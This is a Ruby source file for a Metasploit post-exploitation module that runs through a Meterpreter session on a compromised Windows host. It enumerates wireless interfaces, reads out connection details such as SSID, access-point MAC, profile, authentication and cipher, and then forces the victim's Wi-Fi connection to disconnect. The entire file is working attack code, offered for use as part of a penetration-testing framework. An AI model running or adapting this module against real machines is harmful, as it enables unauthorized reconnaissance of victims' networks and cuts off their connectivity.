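##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Auxiliary::Report

  # dwClientVersion handed to WlanOpenHandle; 2 selects the Vista-and-later API.
  WLAN_CLIENT_VERSION = 2
  # WLAN_INTF_OPCODE asking WlanQueryInterface for the current connection attributes.
  WLAN_INTF_OPCODE_CURRENT_CONNECTION = 7

  # WLAN_CONNECTION_MODE -> human readable
  CONNECTION_MODES = {
    0 => 'A profile is used to make the connection.',
    1 => 'A temporary profile is used to make the connection.',
    2 => 'Secure discovery is used to make the connection.',
    3 => 'Unsecure discovery is used to make the connection.',
    4 => 'connection initiated by wireless service automatically using a persistent profile.',
    5 => 'Invalid connection mode.'
  }.freeze

  # DOT11_BSS_TYPE -> human readable
  BSS_TYPES = {
    1 => 'Infrastructure',
    2 => 'Independent',
    3 => 'Any'
  }.freeze

  # DOT11_PHY_TYPE -> human readable
  PHY_TYPES = {
    1 => 'Frequency-hopping spread-spectrum (FHSS)',
    2 => 'Direct sequence spread spectrum (DSSS)',
    3 => 'Infrared (IR) baseband',
    4 => 'Orthogonal frequency division multiplexing (OFDM)',
    5 => 'High-rate DSSS (HRDSSS)',
    6 => 'Extended rate PHY type',
    7 => '802.11n PHY type'
  }.freeze

  # DOT11_AUTH_ALGORITHM -> human readable
  AUTH_ALGORITHMS = {
    1 => '802.11 Open',
    2 => '802.11 Shared',
    3 => 'WPA',
    4 => 'WPA-PSK',
    5 => 'WPA-None',
    6 => 'RSNA',
    7 => 'RSNA with PSK'
  }.freeze

  # DOT11_CIPHER_ALGORITHM -> human readable
  CIPHER_ALGORITHMS = {
    0 => 'None',
    1 => 'WEP-40',
    2 => 'TKIP',
    4 => 'CCMP',
    5 => 'WEP-104',
    256 => 'Use Group Key',
    257 => 'WEP'
  }.freeze

  # WLAN_INTERFACE_STATE -> human readable
  INTERFACE_STATES = {
    0 => 'The interface is not ready to operate.',
    1 => 'The interface is connected to a network.',
    2 => 'The interface is the first node in an ad hoc network. No peer has connected.',
    3 => 'The interface is disconnecting from the current network.',
    4 => 'The interface is not connected to any network.',
    5 => 'The interface is attempting to associate with a network.',
    6 => 'Auto configuration is discovering the settings for the network.',
    7 => 'The interface is in the process of authenticating.'
  }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Disconnect Wireless Connection',
        'Description' => %q{
          This module disconnects the current wireless network connection
          on the specified interface.
        },
        'License' => MSF_LICENSE,
        'Author' => ['theLightCosine'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_railgun_api
              stdapi_sys_process_attach
              stdapi_sys_process_getpid
            ]
          }
        }
      )
    )

    register_options([
      OptInt.new('Interface', [true, 'The Index of the Interface to Disconnect. Leave at 0 if only one IF', 0])
    ])
  end

  # Entry point: opens the WlanAPI client handle, hands off to
  # disconnect_wlan_interface and guarantees the handle is closed afterwards,
  # whichever path (error, early return or exception) the work takes.
  def run
    # Railgun hands back pointers into the session's own process, so open that
    # process to read the structures WlanAPI fills in.
    mypid = client.sys.process.getpid
    @host_process = client.sys.process.open(mypid, PROCESS_ALL_ACCESS)
    @wlanapi = client.railgun.wlanapi

    wlan_handle = open_handle
    unless wlan_handle
      print_error("Couldn't open WlanAPI Handle. WLAN API may not be installed on target")
      print_error('On Windows XP this could also mean the Wireless Zero Configuration Service is turned off')
      return
    end

    begin
      disconnect_wlan_interface(wlan_handle, datastore['Interface'].to_i)
    ensure
      # Previously every branch closed the handle by hand; a single ensure
      # covers them all, including an exception raised mid-way.
      close_wlan_handle(wlan_handle)
    end
  end

  # Prints the connection on the interface at +index+ and asks WlanAPI to drop it.
  #
  # @param wlan_handle [Integer] client handle from open_handle
  # @param index [Integer] position in the WlanEnumInterfaces list
  # @return [void] prints an error and returns when the index is out of range
  #   or the interface has no active connection
  def disconnect_wlan_interface(wlan_handle, index)
    wlan_iflist = enum_interfaces(wlan_handle)
    # A negative index would silently select from the end of the Ruby array.
    interface = index < 0 ? nil : wlan_iflist[index]
    unless interface
      print_error('The Supplied Interface Index is Invalid')
      return
    end

    connect_info = query_current_connection(wlan_handle, interface['guid'])
    unless connect_info
      print_error('This Interface is not currently connected to a network.')
      return
    end

    print_status(format_wlan_connection(interface, connect_info))

    print_status('Disconnecting...')
    @wlanapi.WlanDisconnect(wlan_handle, interface['guid'], nil)
    # Give the interface time to tear the association down before re-checking.
    sleep(10)

    if query_current_connection(wlan_handle, interface['guid'])
      print_error('The Interface still appears to be connected.')
    else
      print_good('The Interface has been disconnected successfully')
    end
  end

  # Builds the multi-line status report for an interface and its connection.
  #
  # @param interface [Hash] entry from enum_interfaces ('guid', 'description', 'state')
  # @param info [Hash] entry from query_current_connection
  # @return [String]
  def format_wlan_connection(interface, info)
    guid = guid_to_string(interface['guid'])
    [
      "GUID: #{guid} \nDescription: #{interface['description']} \nState: #{interface['state']}\n",
      "Currently Connected to: \n",
      "\tMode: #{info['mode']} \n\tProfile: #{info['profile']} \n",
      "\tSSID: #{info['ssid']} \n\tAP MAC: #{info['bssid']} \n",
      "\tBSS Type: #{info['type']} \n\tPhysical Type: #{info['physical']} \n",
      "\tSignal Strength: #{info['signal']} \n\tRX Rate: #{info['rxrate']} \n",
      "\tTX Rate: #{info['txrate']} \n\tSecurity Enabled: #{info['security']} \n",
      "\toneX Enabled: #{info['oneX']} \n\tAuthentication Algorithm: #{info['auth']} \n",
      "\tCipher Algorithm: #{info['cipher']} \n"
    ].join
  end

  # Releases the WlanAPI client handle and reports whether that succeeded.
  #
  # @param wlan_handle [Integer] handle returned by open_handle
  # @return [void]
  def close_wlan_handle(wlan_handle)
    result = @wlanapi.WlanCloseHandle(wlan_handle, nil)
    # Railgun exposes the Win32 return code as 'return'; 0 is ERROR_SUCCESS.
    if result['return'] == 0
      print_status('WlanAPI Handle Closed Successfully')
    else
      print_error('There was an error closing the Handle')
    end
  end

  # Opens a WlanAPI client handle.
  #
  # @return [Integer, nil] the client handle, or nil when the call raises or
  #   returns a non-zero Win32 error code (the caller reports the failure)
  def open_handle
    result = @wlanapi.WlanOpenHandle(WLAN_CLIENT_VERSION, nil, 4, 4)
    return nil unless result['return'] == 0

    result['phClientHandle']
  rescue StandardError
    nil
  end

  # Reads a little-endian unsigned 32-bit value out of the host process.
  #
  # @param pointer [Integer] address to read from
  # @return [Integer, nil] nil when fewer than four bytes come back
  def read_dword(pointer)
    @host_process.memory.read(pointer, 4).to_s.unpack('V').first
  end

  # Queries the current connection attributes of one interface and decodes the
  # WLAN_CONNECTION_ATTRIBUTES structure WlanAPI returns.
  #
  # @param wlan_handle [Integer] client handle from open_handle
  # @param guid [String] 16-byte interface GUID from enum_interfaces
  # @return [Hash, nil] decoded attributes, or nil when the query fails or the
  #   reported SSID length is zero (interface not connected)
  def query_current_connection(wlan_handle, guid)
    connection = {}
    conn_info = @wlanapi.WlanQueryInterface(wlan_handle, guid, WLAN_INTF_OPCODE_CURRENT_CONNECTION, nil, 4, 4, nil)
    # A non-zero return code means ppData is not valid to dereference.
    return nil unless conn_info['return'] == 0

    pointer = conn_info['ppData']
    return nil if pointer.nil? || pointer == 0

    # Skip the interface state DWORD; enum_interfaces already reported it.
    pointer += 4
    connection['mode'] = CONNECTION_MODES.fetch(read_dword(pointer), 'Unknown connection Mode.')

    # Wireless profile name used for the connection (512-byte buffer)
    pointer += 4
    profile = @host_process.memory.read(pointer, 512)
    connection['profile'] = profile.gsub(/\x00/, '')

    # SSID length. The old `unless len.unpack('V')[0]` never fired because 0 is
    # truthy in Ruby; a zero length is what signals "not connected" here.
    pointer += 512
    ssid_len = read_dword(pointer)
    return nil if ssid_len.nil? || ssid_len == 0

    # SSID of the BSS (32-byte buffer)
    pointer += 4
    ssid = @host_process.memory.read(pointer, 32)
    connection['ssid'] = ssid.gsub(/\x00/, '')

    pointer += 32
    connection['type'] = BSS_TYPES.fetch(read_dword(pointer), 'Unknown BSS Type')

    # BSSID: six raw bytes rendered as colon-separated hex
    pointer += 4
    bssid = @host_process.memory.read(pointer, 6)
    connection['bssid'] = bssid.unpack('H*').first.scan(/../).join(':')

    # 6-byte MAC plus 2 bytes of padding before the PHY type
    pointer += 8
    connection['physical'] = PHY_TYPES.fetch(read_dword(pointer), 'Unknown Association Type')

    # PHY type plus the following DWORD (PHY index) before signal quality
    pointer += 8
    connection['signal'] = read_dword(pointer)

    pointer += 4
    connection['rxrate'] = read_dword(pointer)

    pointer += 4
    connection['txrate'] = read_dword(pointer)

    pointer += 4
    connection['security'] = read_dword(pointer) == 1 ? 'Yes' : 'No'

    pointer += 4
    connection['oneX'] = read_dword(pointer) == 1 ? 'Yes' : 'No'

    pointer += 4
    connection['auth'] = AUTH_ALGORITHMS.fetch(read_dword(pointer), 'Unknown Algorithm')

    pointer += 4
    connection['cipher'] = CIPHER_ALGORITHMS.fetch(read_dword(pointer), 'Unknown Cipher')

    connection
  end

  # Enumerates the wireless interfaces known to WlanAPI.
  #
  # @param wlan_handle [Integer] client handle from open_handle
  # @return [Array<Hash>] one hash per interface with 'guid' (16 raw bytes),
  #   'description' (NULs stripped) and a human readable 'state'
  def enum_interfaces(wlan_handle)
    iflist = @wlanapi.WlanEnumInterfaces(wlan_handle, nil, 4)
    pointer = iflist['ppInterfaceList']

    # WLAN_INTERFACE_INFO_LIST starts with the item count and an index DWORD;
    # a nil count (short read) yields an empty list instead of an endless range.
    count = read_dword(pointer).to_i
    pointer += 8

    Array.new(count) do
      guid = @host_process.memory.read(pointer, 16)
      pointer += 16
      description = @host_process.memory.read(pointer, 512)
      pointer += 512
      state = read_dword(pointer)
      pointer += 4

      {
        'guid' => guid,
        'description' => description.gsub(/\x00/, ''),
        'state' => INTERFACE_STATES.fetch(state, 'Unknown State')
      }
    end
  end

  # Converts a 16-byte GUID into its registry-style string form.
  # The first three fields are little-endian on the wire, so their bytes are
  # reversed; the last two are copied through as-is.
  #
  # @param guid [String] 16 raw bytes
  # @return [String] e.g. "{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}"
  def guid_to_string(guid)
    hex = guid.unpack('H*').first
    data1 = hex[0, 8].scan(/../).reverse.join
    data2 = hex[8, 4].scan(/../).reverse.join
    data3 = hex[12, 4].scan(/../).reverse.join
    "{#{data1}-#{data2}-#{data3}-#{hex[16, 4]}-#{hex[20, 12]}}"
  end
end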